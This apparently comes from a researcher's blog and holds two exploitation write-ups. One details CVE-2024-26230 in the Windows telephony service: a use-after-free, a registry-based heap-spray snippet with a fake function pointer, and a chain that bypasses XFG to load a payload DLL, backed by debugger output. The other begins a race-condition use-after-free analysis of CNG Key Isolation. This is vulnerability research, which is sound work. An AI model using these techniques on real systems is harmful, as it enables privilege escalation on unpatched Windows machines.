K0shl
A trick, the story of CVE-2024-26230
In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service that I reported; it was assigned CVE-2024-26230. I have completed an exploit for it, using an interesting trick to bypass the XFG mitigation on Windows 11.
Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.
Root Cause
The telephony service is an RPC-based service that does not run by default, but a normal user can start it by calling the StartServiceW API.
There are only three functions in the telephony RPC server interface.

long ClientAttach(
    [out][context_handle] void** arg_0,
    [in]long arg_1,
    [out]long *arg_2,
    [in][string] wchar_t* arg_3,
    [in][string] wchar_t* arg_4);
void ClientRequest(
    [in][context_handle] void* arg_0,
    [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/,
    [in]long arg_2,
    [in][out]long *arg_3);
void ClientDetach(
    [in][out][context_handle] void** arg_0);
}

The roles are easy to guess: ClientAttach creates a context handle, ClientRequest processes requests using the specified context handle, and ClientDetach releases the context handle.
In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.
Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.
The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".
void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5)
{
  [...]
  if ( object )
  {
    *object = 0x474F4C44; // =====> [a]
    v38 = *(_QWORD *)(contexthandle + 184);
    *((_QWORD *)object + 10) = v38;
    if ( v38 )
      *(_QWORD *)(v38 + 72) = object;
    *(_QWORD *)(contexthandle + 184) = object; // =======> [b]
    a2[8] = object[22];
  }
  [...]
}

As the code above shows, the service stores the magic value 0x474F4C44 (GOLD) in the object [a] and links the object into the context handle object [b].
Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:
v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object
if ( v28
  && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28),
      *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belongs to the context handle object
   )
{

However, when the "GOLD" object is freed, the service doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another that invokes the dispatch function "FreeDialogInstance" to free it. Consequently, the "GOLD" object is freed while the original context handle object still holds a pointer to it.
__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2)
{
  [...]
  v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64);
  [...]
  if ( *v4 == 0x474F4C44 ) // only checks that the magic value equals 0x474f4c44; it doesn't check whether the object belongs to the context handle object
    [...] // free the object
}

This results in the original context handle object holding a dangling pointer. The dispatch function "TUISPIDLLCallback" then uses this dangling pointer, leading to a use-after-free. As a result, the telephony service crashes when it attempts to call a virtual function through the freed object.
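The missing ownership check can be illustrated with a small, self-contained model. This is only a sketch: the `Object` struct, the table size, and the function names `new_object`, `reference_object`, `free_unchecked`, and `free_checked` are hypothetical stand-ins, not the service's real layout or API, and `free_checked` shows one possible check rather than the actual fix. Objects are marked as dead instead of being released, so the model itself never touches freed memory.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MAGIC_GOLD 0x474F4C44u  /* "GOLD", taken from the decompiled code */
#define TABLE_SIZE 16           /* hypothetical table size */

/* Hypothetical, simplified object; the real one is larger. */
typedef struct {
    uint32_t magic;  /* type tag checked on lookup                  */
    int      owner;  /* id of the context handle that created it    */
    bool     live;   /* false once "freed" (nothing is really freed) */
} Object;

static Object g_table[TABLE_SIZE];  /* stand-in for ghHandleTable */

/* Create an object for `owner`; returns its handle, or -1 if full. */
int new_object(int owner, uint32_t magic) {
    for (int h = 0; h < TABLE_SIZE; h++) {
        if (!g_table[h].live) {
            g_table[h] = (Object){ magic, owner, true };
            return h;
        }
    }
    return -1;
}

/* Look up a handle and verify only the magic value. */
Object *reference_object(int handle, uint32_t magic) {
    if (handle < 0 || handle >= TABLE_SIZE) return NULL;
    Object *o = &g_table[handle];
    return (o->live && o->magic == magic) ? o : NULL;
}

/* Vulnerable pattern: any caller can free any "GOLD" handle. */
bool free_unchecked(int caller, int handle) {
    (void)caller;  /* the caller's identity is never consulted */
    Object *o = reference_object(handle, MAGIC_GOLD);
    if (!o) return false;
    o->live = false;
    return true;
}

/* Checked pattern: additionally require that the caller owns the object. */
bool free_checked(int caller, int handle) {
    Object *o = reference_object(handle, MAGIC_GOLD);
    if (!o || o->owner != caller) return false;
    o->live = false;
    return true;
}
```

With an object created by client 1, `free_checked(2, h)` fails while `free_unchecked(2, h)` succeeds, which is the situation that leaves client 1 holding a stale pointer.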
__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5)
{
  [...]
  v7 = (unsigned int)controlledbuffer[2];
  v8 = 0i64;
  v9 = controlledbuffer + 4;
  v10 = controlledbuffer + 5;
  if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) )
    goto LABEL_30;
  switch ( controlledbuffer[3] )
  {
    [...]
    case 3:
      for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8);
            freedbuffer;
            freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8
      {
        if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value
        {
          v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer
          goto LABEL_27;
        }
      }
      break;
    [...]
  if ( v8 )
  {
    result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF
    [...]
}

Note that the controlled buffer in the code above is the input buffer of the RPC client, so the attacker controls all of its content. This ultimately leads to a crash.
0:001> R
rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000
rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44
rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000
r8=000000ec0f9bea30 r9=000000ec0f9bee90 r10=ffffffffffffffff
r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00
r14=00000203df002b00 r15=000000ec0f9bf238
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
tapisrv!FreeDialogInstance+0x7c:
00007ffc`b4b4955c 393e cmp dword ptr [rsi],edi ds:00000000`00000000=????????
0:001> K
 # Child-SP RetAddr Call Site
00 000000ec`0f9bee80 00007ffc`b4b47295 tapisrv!FreeDialogInstance+0x7c
01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc tapisrv!CleanUpClient+0x451
02 000000ec`0f9bf2a0 00007ffc`d9b85809 tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c
03 000000ec`0f9bf2e0 00007ffc`d9b840f6 RPCRT4!NDRSRundownContextHandle+0x21
04 000000ec`0f9bf330 00007ffc`d9bcb935 RPCRT4!DestroyContextHandlesForGuard+0xbe
05 000000ec`0f9bf370 00007ffc`d9bcb8b4 RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d
06 000000ec`0f9bf3a0 00007ffc`d9bcade4 RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14
07 000000ec`0f9bf3d0 00007ffc`d9bcad27 RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80
08 000000ec`0f9bf400 00007ffc`d9b8704e RPCRT4!OSF_SCONNECTION::FreeObject+0x17
09 000000ec`0f9bf430 00007ffc`d9b861ea RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e
0a 000000ec`0f9bf510 00007ffc`d9b97f5c RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e
0b 000000ec`0f9bf610 00007ffc`d9b97e22 RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
0c 000000ec`0f9bf690 00007ffc`d8828f51 RPCRT4!CO_NmpThreadPoolCallback+0x42
0d 000000ec`0f9bf6d0 00007ffc`db34aa58 KERNELBASE!BasepTpIoCallback+0x51
0e 000000ec`0f9bf720 00007ffc`db348d03 ntdll!TppIopExecuteCallback+0x198

Find Primitive
When I discovered this vulnerability, I quickly realized that it could be exploited because I control the timing of both releasing and using the object.
However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.
So I need to check whether there is a suitable object in the telephony service. A small tip: I don't even need an 'object'. All I want is a memory allocation whose size and content I can both control.
After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.
if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a]
{
  if ( !RegOpenKeyExW(
          phkResult,
          L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities",
          0,
          0x20019u,
          &hKey) )
  {
    GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b]
    RegCloseKey(hKey);
  }
///////////////////////////////////////////
if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c]
{
  [...]
}
else
{
  v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d]
  v7 = (wchar_t *)v6;
  if ( v6 )
  {
    *(_WORD *)v6 = 34;
    LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e]
    [...]
}

The dispatch function "TRequestMakeCall" first opens the HKCU root key [a] and invokes the GetPriorityList function to read the "RequestMakeCall" value [b]. After checking the permissions on this key, I found that it is fully controlled by the current user, so I can modify the value. The function "GetPriorityList" first retrieves the type and size of the value [c], then allocates a heap buffer [d] and reads the value into it [e]. This implies that if I control the value, I control both the size and the content of the heap allocation.
The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.
Heap Fengshui
Now that I have a suitable primitive, it's time to perform heap feng shui. Because I control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.
- First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
- Then, I free some of them to create some holes using the "FreeDialogInstance" function.
- Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
- After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
- Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.
XFG mitigation
After the final step of the heap feng shui in the previous section, the controlled key value buffer occupies the target hole. I then invoke the "TUISPIDLLCallback" function to trigger the "use" step. As the pseudocode above shows, the controlled buffer is the input buffer of the RPC interface: if I set controlledbuffer[3] to 3, the function compares controlledbuffer[2] with a magic value in the worker object and then fetches a virtual function address from the worker object. So I only need to set these two values in the content of the registry key value.
RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall");
RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey);
BYTE lpbuffer[0x5e] = { 0 };
*(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018;
*(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer
RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);

It seems that there is only one step left to complete the exploitation. I control the address of the virtual function, which means I control the RIP register. Without XFG, I could use ROP. However, XFG prevents RIP from jumping to a ROP gadget address and raises an INT 29 exception when the control flow check fails.
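The offsets 0xE and 0x1E in the registry value follow from two facts shown earlier: GetPriorityList writes a 2-byte quote character before the value data, and TUISPIDLLCallback reads a DWORD at object offset 16 and a function pointer at object offset 32. The portable sketch below rebuilds the same value bytes without any Windows API. The names `build_fake_object`, `PREFIX_LEN`, and the other macros are hypothetical, and treating the allocation as 0x60 bytes is an inference from `cbData + 2`, not a confirmed object size.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PREFIX_LEN 2     /* the service writes a 2-byte '"' before the data */
#define OBJ_ID_OFF 0x10  /* DWORD compared with controlledbuffer[2]          */
#define OBJ_FN_OFF 0x20  /* function pointer fetched by TUISPIDLLCallback    */
#define OBJ_SIZE   0x60  /* inferred: 0x5E value bytes + 2 prefix bytes      */
#define VALUE_SIZE (OBJ_SIZE - PREFIX_LEN)

/* Fill `value` (VALUE_SIZE bytes) so that, once the service prepends its
 * 2-byte prefix, `id` and `fn` land at the object offsets read on "use".
 * Everything else stays zero, including the "next" link at object
 * offset 80, which ends the list walk after this entry. */
void build_fake_object(uint8_t *value, uint32_t id, uint64_t fn) {
    memset(value, 0, VALUE_SIZE);
    memcpy(value + (OBJ_ID_OFF - PREFIX_LEN), &id, sizeof id);
    memcpy(value + (OBJ_FN_OFF - PREFIX_LEN), &fn, sizeof fn);
}
```

Calling `build_fake_object(buf, 0x40000018, addr)` produces the same 0x5E-byte layout as the snippet above, with the id at value offset 0xE and the pointer at value offset 0x1E.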
Last step, the true challenge
Just like the exploitation I introduced in my previous blog post (the exploitation of CNG Key Isolation), once I control RIP it's useful to invoke LoadLibrary to load a payload DLL. However, I quickly ran into trouble this time when I tried to set the virtual function address to the LoadLibrary address.
Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:
result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF

- The first parameter is a DWORD value taken from the RPC input buffer, which the client controls.
- The second parameter is also taken from the RPC input buffer, but it must be a constant: it equals the case number mentioned in the previous section, so it must be 3.
- The third parameter is a pointer. Its base is the controlled buffer address plus 0x3C, to which an offset taken from the controlled RPC input buffer is added.
- The fourth parameter is a DWORD taken from the controlled RPC input buffer.
It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.
So I can't use LoadLibrary directly to load the payload DLL, and I need another way to complete the exploitation. My first idea was to find a function that loads a DLL indirectly: because the third parameter is a pointer whose content I control, I need a function shaped like this:

func(a1, a2, a3, ...){
  [...]
  path = a3;
  LoadLibrary(path);
  [...]
}

The limitation in this scenario is that I can't control which DLLs are loaded in the RPC server, so I can only use functions from DLLs that are already loaded. I spent some time looking for an eligible function, but failed to find one.
It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.
The trick
After some time, I remembered an interesting API: VirtualAlloc.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first parameter of VirtualAlloc is lpAddress, which can be set to a specific value, and the system will try to allocate memory at that address.
I noticed that I can use this function to allocate memory at an address that fits in 32 bits!
The second parameter is a constant value that becomes the size of the allocation, but its exact value doesn't matter for my purpose. The last parameter is a controlled DWORD value, which I can use as flProtect. I can set it to PAGE_EXECUTE_READWRITE (0x40).
But a new challenge arises with the third parameter.
The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random value, but all of it failed.
Let's review the "use" code again:
result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
if(!result){
  [...]
}
*controlledbuffer = result;
return result;

The return value of the virtual function is stored in the controlled buffer, which is then returned to the client. This means that if I call an allocation function such as MIDL_user_allocate, it returns a 64-bit address, but only the low 32 bits of the address are returned to the client. This is a useful information disclosure.
But I still can't predict the low 32 bits of the third parameter when invoking VirtualAlloc. So I tried increasing the allocation size to see whether there is any regularity. In fact, the maximum input buffer size an RPC client can set is larger than 0x40000000. When I set the allocation size to 0x40000000, I found an interesting situation.
I found that when the allocation size is set to 0x40000000, the low 32 bits of the pointer increase linearly, which makes them predictable.
That means, for example, if the leaked low 32 bits are 0xbd700000, I know that with the input buffer size set to 0x40000000, the next controlled buffer's low 32 bits will be 0xfd800000. Additionally, the offset of the third parameter can't be larger than the input buffer size. Therefore, I need to ensure that the low 32 bits of the address are larger than 0xc0000000. That way, the address plus the offset can exceed 0x100000000, so the low 32 bits of the third parameter wrap around and can be set to 0x3000 (MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000)).
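The wrap-around arithmetic can be written down as a short sketch. It assumes the bound enforced on the offset is simply "offset not larger than the input buffer size" (the exact behaviour of IsBadSizeOffset is not shown here), and it takes as input the low 32 bits of the pointer before the client-supplied offset is added. The function names `required_offset` and `offset_is_usable` are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define MEM_COMMIT_RESERVE 0x3000u      /* MEM_COMMIT | MEM_RESERVE           */
#define MAX_OFFSET         0x40000000u  /* input buffer size used in the text */

/* Offset to add so that the low 32 bits of (base + offset) equal `target`.
 * Unsigned 32-bit arithmetic wraps modulo 2^32, which is the point. */
uint32_t required_offset(uint32_t base_low32, uint32_t target) {
    return (uint32_t)(target - base_low32);
}

/* Assumed bound: the offset has to stay within the input buffer size. */
bool offset_is_usable(uint32_t base_low32, uint32_t target) {
    return required_offset(base_low32, target) <= MAX_OFFSET;
}
```

For the predicted address 0xfd800000, the required offset is 0x02803000, which fits inside a 0x40000000-byte buffer. For 0xbd700000 the required offset would be 0x42903000, which does not fit; this is why the low 32 bits need to be above 0xc0000000.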
To summarize so far: I perform the heap feng shui and control the whole content of the heap hole through the controllable registry key value. To bypass XFG, I first leak the low 32 bits of the address by putting the MIDL_user_allocate function address in the key value, and then put the VirtualAlloc function address in the key value. Obviously, it doesn't end once the 32-bit address is allocated: I need to invoke "TUISPIDLLCallback" multiple times to complete the bypass. The good news is that I control the timing of the "use", so all I need to do is free the registry key value heap, set the new key value with the next target function address, allocate a new key value heap, and use it again.
tapisrv!TUISPIDLLCallback+0x1cc:
00007fff`7c27fecc ff154ee80000 call qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)}
0:007> u rax
KERNEL32!VirtualAllocStub:
00007fff`aeae3bf0 48ff2551110700 jmp qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)]
00007fff`aeae3bf7 cc int 3
00007fff`aeae3bf8 cc int 3
00007fff`aeae3bf9 cc int 3
00007fff`aeae3bfa cc int 3
00007fff`aeae3bfb cc int 3
00007fff`aeae3bfc cc int 3
00007fff`aeae3bfd cc int 3
0:007> r r8d
r8d=3000
0:007> r r9d
r9d=40
0:007> r rcx
rcx=00000000ba000000
0:007> r rdx
rdx=0000000000000003

According to the debugging information, every parameter satisfies the requirements. After invoking the VirtualAlloc function, I have successfully allocated memory at a 32-bit address.
0:007> p
tapisrv!TUISPIDLLCallback+0x1d2:
00007fff`7c27fed2 85c0 test eax,eax
0:007> dq ba000000
00000000`ba000000 00000000`00000000 00000000`00000000
00000000`ba000010 00000000`00000000 00000000`00000000
00000000`ba000020 00000000`00000000 00000000`00000000
00000000`ba000030 00000000`00000000 00000000`00000000
00000000`ba000040 00000000`00000000 00000000`00000000

This means I now control the first parameter as a pointer. The next step is to copy the payload DLL path to the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decided to use the memcpy_s function, where the second parameter is the destination size, which caps the copy length, and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.
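The 3-byte limit turns the path copy into a loop of small copies. The sketch below models that loop locally: `bounded_copy` is a hypothetical stand-in for a single call that ends up in memcpy_s with a destination size of 3, and `copy_in_chunks` plays the role of the client repeating the "use" step with an advancing destination and source. It is not exploit code and makes no RPC calls.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CHUNK 3  /* the fixed second argument caps each copy at 3 bytes */

/* Stand-in for one call: refuse the copy if `count` exceeds the
 * destination size, otherwise copy `count` bytes. */
int bounded_copy(uint8_t *dst, size_t dst_size,
                 const uint8_t *src, size_t count) {
    if (count > dst_size) return -1;
    memcpy(dst, src, count);
    return 0;
}

/* Copy `len` bytes in pieces of at most CHUNK bytes.
 * Returns the number of calls made, or 0 if any call failed. */
size_t copy_in_chunks(uint8_t *dst, const uint8_t *src, size_t len) {
    size_t calls = 0;
    for (size_t done = 0; done < len; done += CHUNK) {
        size_t n = (len - done < CHUNK) ? len - done : CHUNK;
        if (bounded_copy(dst + done, CHUNK, src + done, n) != 0) return 0;
        calls++;
    }
    return calls;
}
```

A 10-byte buffer, for instance, takes four calls (3 + 3 + 3 + 1 bytes). A wide-character path is copied the same way, since the chunking works on raw bytes and does not need to align with the 2-byte characters.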
0:009> dc ba000000
00000000`ba000000 003a0043 0055005c 00650073 00730072 C.:.\.U.s.e.r.s.
00000000`ba000010 0070005c 006e0077 0041005c 00700070 \.p.w.n.\.A.p.p.
00000000`ba000020 00610044 00610074 0052005c 0061006f D.a.t.a.\.R.o.a.
00000000`ba000030 0069006d 0067006e 0066005c 006b0061 m.i.n.g.\.f.a.k.
00000000`ba000040 00640065 006c006c 0064002e 006c006c e.d.l.l...d.l.l.

The last step is invoking LoadLibrary to load the payload DLL.
0:009> u
KERNELBASE!LoadLibraryW:
00007fff`ad1f2480 4533c0 xor r8d,r8d
00007fff`ad1f2483 33d2 xor edx,edx
00007fff`ad1f2485 e9e642faff jmp KERNELBASE!LoadLibraryExW (00007fff`ad196770)
00007fff`ad1f248a cc int 3
00007fff`ad1f248b cc int 3
00007fff`ad1f248c cc int 3
00007fff`ad1f248d cc int 3
00007fff`ad1f248e cc int 3
0:009> dc rcx
00000000`ba000000 003a0043 0055005c 00650073 00730072 C.:.\.U.s.e.r.s.
00000000`ba000010 0070005c 006e0077 0041005c 00700070 \.p.w.n.\.A.p.p.
00000000`ba000020 00610044 00610074 0052005c 0061006f D.a.t.a.\.R.o.a.
00000000`ba000030 0069006d 0067006e 0066005c 006b0061 m.i.n.g.\.f.a.k.
00000000`ba000040 00640065 006c006c 0064002e 006c006c e.d.l.l...d.l.l.
00000000`ba000050 00000000 00000000 00000000 00000000 ................
00000000`ba000060 00000000 00000000 00000000 00000000 ................
00000000`ba000070 00000000 00000000 00000000 00000000 ................
0:009> k
 # Child-SP RetAddr Call Site
00 000000ab`ac97eac8 00007fff`7c27fed2 KERNELBASE!LoadLibraryW
01 000000ab`ac97ead0 00007fff`7c27817a tapisrv!TUISPIDLLCallback+0x1d2
02 000000ab`ac97eb60 00007fff`afb57f13 tapisrv!ClientRequest+0xba
Isolate me from sandbox - Explore elevation of privilege of CNG Key Isolation
In recent months, Microsoft patched vulnerabilities I reported in the CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906. CVE-2023-28229 covers 6 use-after-free vulnerabilities with a similar root cause, and CVE-2023-36906 is an out-of-bounds read information disclosure. Microsoft marked them as "Exploitation Less Likely" in its assessment, but I actually completed an exploit using these two vulnerabilities.
As an annual update blogger(sorry for that:P), I share this blogpost to introduce my exploitation on CNG Key Isolation service, so let's start our journey!
Simple Overview
CNG Key Isolation is a service hosted in the lsass process that isolates private keys in a separate process. It works as an RPC server that can be accessed from AppContainer integrity processes, such as the render process in Adobe or Firefox. There are some important objects in the keyiso service; let's go through them briefly:
- Context object. The context object is the management object of the keyiso RPC server. It holds the provider object when the client opens a storage provider to create a new provider object, and it is managed by a global list named SrvCryptContextList. This object must be initialized first.
- Provider object. The client opens an existing provider from the collection of all providers. If the open succeeds, the service allocates the provider object and stores its pointer in the context object.
- Key object. The key object is managed by the context object; it is allocated and inserted into the context object.
- Memory Buffer object. The memory buffer object is managed by the context object; it is allocated and inserted into the context object.
- Secret object. The secret object is managed by the context object; it is allocated and inserted into the context object.
Of these objects, the provider, key, and secret objects have a similar structure. Offset 0x0 stores the magic value: 0x44444446 means provider object, 0x44444447 means key object, and 0x44444449 means secret object. When one of these objects is freed, the magic value is set to another value. Offset 0x8 stores the reference count, and offset 0x30 stores the index of the object. This index acts as the object's handle: the client passes it to look up a specific object. It is predictable, because it starts at 0 and increases by 1 each time a new object is allocated.
There is one more detail about how I win the race using the object handle. When I reviewed the code, I noticed that the handle is predictable. Let's check the SrvAddKeyToList function:

SrvAddKeyToList:
  handlevalue = ++*(_QWORD *)(context_object + 0xA0); // =====> [a]
  *(_QWORD *)(key_object + 0x30) = handlevalue; // =====> [b]
SrvFreeKey:
  if ( *((_QWORD *)key_object + 6) == handlevalue ) // ====> [c]
    break;

The handle value is stored at offset 0xA0 of the context object. It is effectively an index: its initial value is 0, and when a new key object is allocated, the index is incremented [a] and stored at offset 0x30 of the new key object [b]. When a key object is freed, the service compares the handle value and, if it matches [c], continues into the vulnerable code. So the handle value is predictable: for example, you can call SrvFreeKey with handle value 1 after creating the first key, or with handle value 10 after creating the tenth key object. This lets the free request find the key object as soon as it is added to the context object with the new handle value.
I made the following simple chart to show the relationship between these objects.
Root cause of CVE-2023-28229
In this section, I will introduce the root cause of CVE-2023-28229. I will use the key object as the example; the other objects have a similar issue.
While researching the keyiso service, I found that each object has its own allocate and free interfaces. For the key object, the allocate RPC interface is named s_SrvRpcCryptCreatePersistedKey and the free RPC interface is named s_SrvRpcCryptFreeKey. I quickly noticed an issue between object allocation and free.
__int64 __fastcall SrvCryptCreatePersistedKey(
        struct _RTL_CRITICAL_SECTION *a1, __int64 a2, _QWORD *a3, __int64 a4, __int64 a5, int a6, int a7)
{
  [...]
  keyobject = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 0x38ui64);
  [...]
  *((_DWORD *)keyobject + 1) = 0;
  *(_DWORD *)keyobject = 0x44444447;
  *((_DWORD *)keyobject + 2) = 1; // ==========> [a]
  *((_QWORD *)keyobject + 4) = v12;
  SrvAddKeyToList((__int64)a1, (__int64)keyobject); // =============> [b]
  v11 = 0;
  *a3 = *((_QWORD *)keyobject + 6);
  return v11;
  [...]
}
__int64 __fastcall SrvCryptFreeKey(__int64 a1, __int64 a2, __int64 a3)
{
  [...]
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ============> [c]
  {
    v17 = SrvFreeKey((PVOID)freebuffer); // ===============> [d]
    if ( v17 < 0 )
      DebugTraceError(
        (unsigned int)v17,
        "Status",
        "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
        700i64);
  }
  if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ===============> [e]
  {
    v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( // ==============> [f]
            *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
            *((_QWORD *)freebuffer + 5));
    v13 = v12;
    [...]
}

When the client invokes the allocate RPC interface, keyiso allocates a buffer from the process heap and initializes the structure. It first sets the reference count of the key object to 1 [a], then adds the key object to the context object and increments the reference count [b]. When the client frees the key object, keyiso checks whether the reference count is 1 [c]; if it is, keyiso frees the key object [d]. But it still uses the key object after the free [e] and then calls a function from the vftable [f].
No lock is held between initializing the reference count to 1 and incrementing it, so there is a time window between the two steps. The key object can be freed [c] [d] right after the reference count is set to 1 [a], and the next check [e] passes once the reference count is incremented [b]. Finally, this causes a use-after-free when the vftable function is called [f].
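The interleaving can be replayed deterministically in a single thread. The sketch below is a simplified model under stated assumptions: `KeyModel`, `fetch_dec`, `free_path_uses_freed`, `normal_order`, and `racy_order` are hypothetical names, the "free" only sets a flag, and the late increment is injected between the two checks rather than coming from a real second thread.

```c
#include <assert.h>
#include <stdbool.h>

typedef struct {
    int  refcount;
    bool freed;
} KeyModel;

/* Models _InterlockedExchangeAdd(&refcount, -1): returns the old value. */
int fetch_dec(KeyModel *k) {
    int old = k->refcount;
    k->refcount = old - 1;
    return old;
}

/* Models the two checks in the free path. Returns true if the virtual
 * call [f] would run on an object that has already been freed. */
bool free_path_uses_freed(KeyModel *k, bool add_between_checks) {
    if (fetch_dec(k) == 1)      /* [c] */
        k->freed = true;        /* [d] */
    if (add_between_checks)
        k->refcount++;          /* [b] arrives late from the other thread */
    if (fetch_dec(k) == 1)      /* [e] */
        return k->freed;        /* [f] */
    return false;
}

/* Creation finishes before the free request: count is 2 when freeing. */
bool normal_order(void) {
    KeyModel k = { 1, false };  /* [a] */
    k.refcount++;               /* [b] */
    return free_path_uses_freed(&k, false);
}

/* The free request lands between [a] and [b]. */
bool racy_order(void) {
    KeyModel k = { 1, false };  /* [a] */
    return free_path_uses_freed(&k, true);
}
```

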